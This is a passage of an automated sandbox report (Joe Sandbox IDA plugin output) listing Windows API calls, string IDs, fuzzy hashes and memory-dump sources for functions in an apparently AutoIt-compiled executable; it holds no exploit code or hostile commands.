          • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
          • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
          APIs
          • LoadIconW.USER32 ref: 0045464C
          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
          • SetWindowTextW.USER32 ref: 00454678
          • GetDlgItem.USER32(?,000003EA), ref: 00454690
          • SetWindowTextW.USER32 ref: 00454697
          • GetDlgItem.USER32(?,000003E9), ref: 004546A8
          • SetWindowTextW.USER32 ref: 004546AF
          • SendDlgItemMessageW.USER32 ref: 004546D1
          • SendDlgItemMessageW.USER32 ref: 004546EB
          • GetWindowRect.USER32(?,?), ref: 004546F5
          • SetWindowTextW.USER32 ref: 00454765
          • GetDesktopWindow.USER32 ref: 0045476F
          • GetWindowRect.USER32(00000000), ref: 00454776
          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
          • GetClientRect.USER32 ref: 004547D2
          • PostMessageW.USER32 ref: 004547FC
          • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
          • String ID:
          • API String ID: 3869813825-0
          • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
          • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
          • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
          • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Cursor$Load$Info
          • String ID:
          • API String ID: 2577412497-0
          • Opcode ID: df8496a5ccf8980c413cee1492e9511dd2a8cf50dccd45c320fbb6698c2849a1
          • Instruction ID: d9ac11be0830284379e84a8ce80867a77d5222e4d8acd5552d2ffd66ae6e186d
          • Opcode Fuzzy Hash: df8496a5ccf8980c413cee1492e9511dd2a8cf50dccd45c320fbb6698c2849a1
          • Instruction Fuzzy Hash: 54314471E4831966EB509FB59C0AB9FBFA0EF40750F10452BE648BF2C0DEB964408BD5
          APIs
          • _wcslen.LIBCMT ref: 00464B28
          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
          • _wcslen.LIBCMT ref: 00464C28
          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
          • _wcslen.LIBCMT ref: 00464CBA
          • _wcslen.LIBCMT ref: 00464CD0
          • _wcslen.LIBCMT ref: 00464CEF
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcslen$Directory$CurrentSystem
          • String ID: D
          • API String ID: 1914653954-2746444292
          • Opcode ID: 2b76ecb7984d35e05f4c969d59adb3917704e48d337bd6df726fdcb1eb086e79
          • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
          • Opcode Fuzzy Hash: 2b76ecb7984d35e05f4c969d59adb3917704e48d337bd6df726fdcb1eb086e79
          • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
          APIs
          • _wcsncpy.LIBCMT ref: 0045CE39
          • __wsplitpath.LIBCMT ref: 0045CE78
          • _wcscat.LIBCMT ref: 0045CE8B
          • _wcscat.LIBCMT ref: 0045CE9E
          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
          • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
          • _wcscpy.LIBCMT ref: 0045CF61
          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
          • String ID: *.*
          • API String ID: 1153243558-438819550
          • Opcode ID: af050dc9c873ffcefc940ecfee082969e462714a91ba007b4a089bb70b1f2f68
          • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
          • Opcode Fuzzy Hash: af050dc9c873ffcefc940ecfee082969e462714a91ba007b4a089bb70b1f2f68
          • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
          APIs
          • DragQueryPoint.SHELL32(?,?), ref: 00470EC0
            • Part of subcall function 00441672: ClientToScreen.USER32(00000000,?), ref: 0044169A
            • Part of subcall function 00441672: GetWindowRect.USER32(?,?), ref: 00441722
            • Part of subcall function 00441672: PtInRect.USER32(?,?,?), ref: 00441734
          • SendMessageW.USER32 ref: 00470F32
          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00470F3B
          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00470F65
          • _wcscat.LIBCMT ref: 00470FA2
          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00470FB7
          • SendMessageW.USER32(?,000000B0,?,?), ref: 00470FC9
          • SendMessageW.USER32(?,000000B1,?,?), ref: 00470FD7
          • SendMessageW.USER32(?,000000B1,?,?), ref: 00470FF4
          • DragFinish.SHELL32(?), ref: 00470FFA
          • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 004710E2
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
          • API String ID: 4085615965-3440237614
          • Opcode ID: d46f0dc6a402942f8e7c2c56388383e1fbb47624789ac98c9c2308d24ef9fef1
          • Instruction ID: 4ea733558c9692989c64ea5f36e42be92b13a76634dc251051ad4f24abf1ae27
          • Opcode Fuzzy Hash: d46f0dc6a402942f8e7c2c56388383e1fbb47624789ac98c9c2308d24ef9fef1
          • Instruction Fuzzy Hash: 076190716043019FD310EF65CC85E9FB7A8FFC9704F104A2EF59497291DB74AA098BAA
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __wcsicoll
          • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
          • API String ID: 3832890014-4202584635
          • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
          • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
          • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
          • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessagePost$CtrlFocus
          • String ID: 0
          • API String ID: 1534620443-4108050209
          • Opcode ID: 9a8351b2c4bf5f490bcd4a564905dd5ac8e2113447f5c791a0f17acd527f7aa2
          • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
          • Opcode Fuzzy Hash: 9a8351b2c4bf5f490bcd4a564905dd5ac8e2113447f5c791a0f17acd527f7aa2
          • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$CreateDestroy
          • String ID: ,$tooltips_class32
          • API String ID: 1109047481-3856767331
          • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
          • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
          • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
          • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
          • String ID: 0
          • API String ID: 1441871840-4108050209
          • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
          • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
          • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
          • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
          APIs
          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
          • __swprintf.LIBCMT ref: 00460915
          • __swprintf.LIBCMT ref: 0046092D
          • _wprintf.LIBCMT ref: 004609E1
          • MessageBoxW.USER32 ref: 004609FA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
          • API String ID: 3631882475-2268648507
          • Opcode ID: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
          • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
          • Opcode Fuzzy Hash: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
          • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
          APIs
          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
          • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
          • SendMessageW.USER32 ref: 00471740
          • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
          • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
          • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
          • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
          • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
          • SendMessageW.USER32 ref: 0047184F
          • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
          • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
          • String ID:
          • API String ID: 4116747274-0
          • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
          • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
          • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
          • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
          APIs
          • GetClassNameW.USER32(?,?,00000100), ref: 00461678
          • _wcslen.LIBCMT ref: 00461683
          • __swprintf.LIBCMT ref: 00461721
          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
          • GetClassNameW.USER32(?,?,00000400), ref: 00461811
          • GetDlgCtrlID.USER32 ref: 00461869
          • GetWindowRect.USER32(?,?), ref: 004618A4
          • GetParent.USER32(?), ref: 004618C3
          • ScreenToClient.USER32(00000000), ref: 004618CA
          • GetClassNameW.USER32(?,?,00000100), ref: 00461941
          • GetWindowTextW.USER32 ref: 0046197E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
          • String ID: %s%u
          • API String ID: 1899580136-679674701
          • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
          • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
          • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
          • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
          APIs
          • GetMenuItemInfoW.USER32 ref: 0045FDDB
          • SetMenuItemInfoW.USER32 ref: 0045FE14
          • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: InfoItemMenu$Sleep
          • String ID: 0
          • API String ID: 1196289194-4108050209
          • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
          • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
          • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
          • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
          APIs
          • GetDC.USER32(00000000), ref: 0043143E
          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
          • CreateCompatibleDC.GDI32(00000000), ref: 00431459
          • SelectObject.GDI32(00000000,?), ref: 00431466
          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
          • String ID: (
          • API String ID: 3300687185-3887548279
          • Opcode ID: f1b961afa2880f7442b12caad1c042fc0961ebfd5d1a206acd62ac5c31c46543
          • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
          • Opcode Fuzzy Hash: f1b961afa2880f7442b12caad1c042fc0961ebfd5d1a206acd62ac5c31c46543
          • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
          APIs
            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
          • GetDriveTypeW.KERNEL32 ref: 0045DB32
          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
